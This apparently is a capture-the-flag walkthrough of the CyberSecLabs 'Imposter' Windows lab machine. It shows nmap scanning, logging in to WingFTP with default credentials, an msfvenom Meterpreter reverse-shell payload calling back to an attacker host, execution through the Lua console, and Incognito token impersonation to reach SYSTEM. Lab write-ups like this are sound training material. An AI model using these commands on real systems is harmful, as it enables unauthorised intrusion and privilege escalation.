CyberSecLabs "Imposter" Walkthrough

Imposter, by CyberSecLabs, is another one of their many offerings that recently released.  Imposter is a Windows machine that has both a manual method and Metasploit module available to gain access to the machine.  In order to fully exploit the machine completely I needed to spin up Metasploit to use the Incognito module.  So let's see how we do it!

Scanning

nmap 172.31.1.20

nmap -A 172.31.1.20

We have several ports open, however the important ones to notice here are ports 21 and 8080.  21 is running FTP, and port 8080 is running WingFTP, which is a graphical FTP manager.

Enumeration & Exploitation

Enumeration begins with visiting the webpage, which we are able to actually log in to with the admin:password default credentials.  This quickly moves right in to exploitation

WingFTP login screen and Dashboard

Quickly poking around reveals that we are an administrative user, and are able to create an FTP user, which there currently aren't any.

User Creation

We've created a user and granted them complete access to the file system.  This is where the unintended exploit was discovered.  WingFTP is running as a low privilege user, however by granting the access I did, I discovered that I was permitted to access the ENTIRE file system, to include the Administrator directory, System32 files, etc.  This is completely unintended, and after researching for some time I was unable to find anything in the wild that suggests this exploit has been discovered before.  I'll be doing more research on this to determine if it's simply a misconfiguration (which it shouldn't be due to user permissions on the underlying machine), or an actual zero day exploit that's not yet been discovered.

Now back to our regularly scheduled walkthrough.

We've now created our user, and can leverage it to gain access to the FTP service on the machine.  We'll first need to log in to it, then create a payload with msfvenom, and can then utilize the Lua Console in WingFTP to execute it and gain a reverse shell in Metasploit.

 ftp 172.31.1.20 login

 User lian directory where we will place our exploit (notice we have RWX permissions on Administrator)

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.0.7 LPORT=5555 -f exe > pwn.exe

 put pwn.exe file upload

Metasploit Multi Handler and Payload parameters

Reverse shell via Lua Console execution - os.execute('cmd.exe /c C://Users/lian/pwn.exe')

At this point we have Meterpreter shell access to the machine and are able to enumerate our current user.  We can do this using the win_privs module first to determine what our privileges are on the system.

run post/windows/gather/win_privs

Notice that we can Delegate and Impersonate privileges.  In order to do this, we can utilize the Incognito module in Meterpreter.  

load incognito; list_tokens -u

We notice that the NT AUTHORITY\SYSTEM token can be delegated, which we will use the impersonate_token command for.

 impersonate_token "NT AUTHORITY\SYSTEM"

With the token impersonated, all you have to do is snag the flags and complete the challenge.

 User and Administrator Flags

 Final Thoughts

Coincidentally I had done a similar machine a couple weeks ago on VirtualHackingLabs that required manual exploitation of the WingFTP server, so I knew what to look for as soon as I saw this show up. All in all it's a really neat challenge, reinforces the usage and strengths of token delegations and authorities, and how to exploit them to elevate privileges.